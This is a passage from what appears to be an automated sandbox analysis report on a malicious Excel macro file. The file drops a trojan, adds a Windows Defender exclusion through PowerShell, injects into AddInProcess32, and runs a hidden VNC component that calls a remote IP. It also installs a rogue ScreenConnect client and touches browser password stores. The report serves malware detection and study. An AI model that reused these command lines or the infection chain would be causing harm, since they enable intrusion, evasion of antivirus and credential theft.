Or6iclhyFxsv', 'yCCq4SfC3sqs64eIBomN0shmCaypDC3cQBAYOs5HyoCxTMxsW+PNGsFzWZfJEZw8qk8Il+wTPXXEUvIkQ3gH7A=='
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 37.2.Document.exe.55d0000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                            Source: 37.2.Document.exe.55d0000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 37.2.Document.exe.55d0000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 37.2.Document.exe.55b0000.5.raw.unpack, ExeFile.csSuspicious method names: .ExeFile.SetPayload
                            Source: 37.2.Document.exe.55b0000.5.raw.unpack, ExeFile.csSuspicious method names: .ExeFile.GetOriginalPayload
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSM@133/106@50/12
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208D8130 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,8_2_00007FFA208D8130
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA16358130 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,22_2_00007FFA16358130
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFB8130 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,27_2_00007FFA1FFB8130
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Document25.xlsmJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2852:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\daqyvsbasipyrpcr
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMutant created: \Sessions\1\BaseNamedObjects\HVNC_MUTEX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{EE38F5BB-59B8-41CB-B33F-5E994D439EC1} - OProcSessId.datJump to behavior
                            Source: Document25.xlsmOLE indicator, Workbook stream: true
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\explorer.exe
                            Source: unknownProcess created: C:\Windows\explorer.exe
                            Source: unknownProcess created: C:\Windows\explorer.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\PayloadJump to behavior
                            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBE65.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4046546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                            Source: AddInProcess32.exe, 0000000C.00000002.6331801761.000000000356D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: Document25.xlsmVirustotal: Detection: 33%
                            Source: Document25.xlsmReversingLabs: Detection: 18%
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip"
                            Source: C:\Program Files\7-Zip\7z.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe"
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                            Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Document.exe "C:\Users\user\AppData\Local\Temp\Document.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\ea32d473b92f819d\ScreenConnect.ClientSetup.msi"
                            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5F31D207096A70303A87FAA569F8958D C
                            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBE65.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4046546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9C864324F3ACEEC3843B308126110901
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 56F78CA946A322F1A8337330F29E556C E Global\MSI0000
                            Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-pi5ke2-relay.screenconnect.com&p=443&s=4e491804-ebd1-4ec1-a81d-3bf98af2b16f&k=BgIAAACkAABSU0ExAAgAAAEAAQDV5xr%2f63eUw3yWSiptbv5fNcp0K%2fm1HgCzug%2fuXVLaE7zXcJaALS5LoNDk%2fCtX1DhHiK7zhI%2bKLvNYucmCVNYhfawyE7GKXdStFwcdW3bdG7Bl1wsDbR9V3DCQtHu0RCULGn2CLbfaMYcxT7HUC8TrGSemBF6idtbA81QikNAwKvc0mAXjUuHQgFKNxH34ev1K7FFVTHQQmAfMWifAR3wQA3I8ZCb2o4gfszrm68%2fq2clfPySQ9B17enljE%2b7B1y8UqGY%2brDfKadO%2fAISlRMCNIopaBIw62z2RT8UYqLCAsO4P%2bQQU%2fFWzzNBS%2bocDYGtZaBBqN9vqtk0Ur5xxoDqt"
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe" "RunRole" "94bdae91-aed5-45b2-b496-05a680474da1" "User"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 176.65.142.74 4448 HVNC_MUTEX
                            Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-pre-read-main-dll --field-trial-handle=2120,i,14894441107756567341,7342821476491626957,262144 --variations-seed-version=20231002-080120.576000 --mojo-platform-channel-handle=2256 /prefetch:3
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip"Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 176.65.142.74 4448 HVNC_MUTEX
                            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Document.exe "C:\Users\user\AppData\Local\Temp\Document.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\ea32d473b92f819d\ScreenConnect.ClientSetup.msi"
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5F31D207096A70303A87FAA569F8958D C
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9C864324F3ACEEC3843B308126110901
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 56F78CA946A322F1A8337330F29E556C E Global\MSI0000
                            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBE65.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4046546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe" "RunRole" "94bdae91-aed5-45b2-b496-05a680474da1" "User"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: unknown unknown
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-pre-read-main-dll --field-trial-handle=2120,i,14894441107756567341,7342821476491626957,262144 --variations-seed-version=20231002-080120.576000 --mojo-platform-channel-handle=2256 /prefetch:3
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
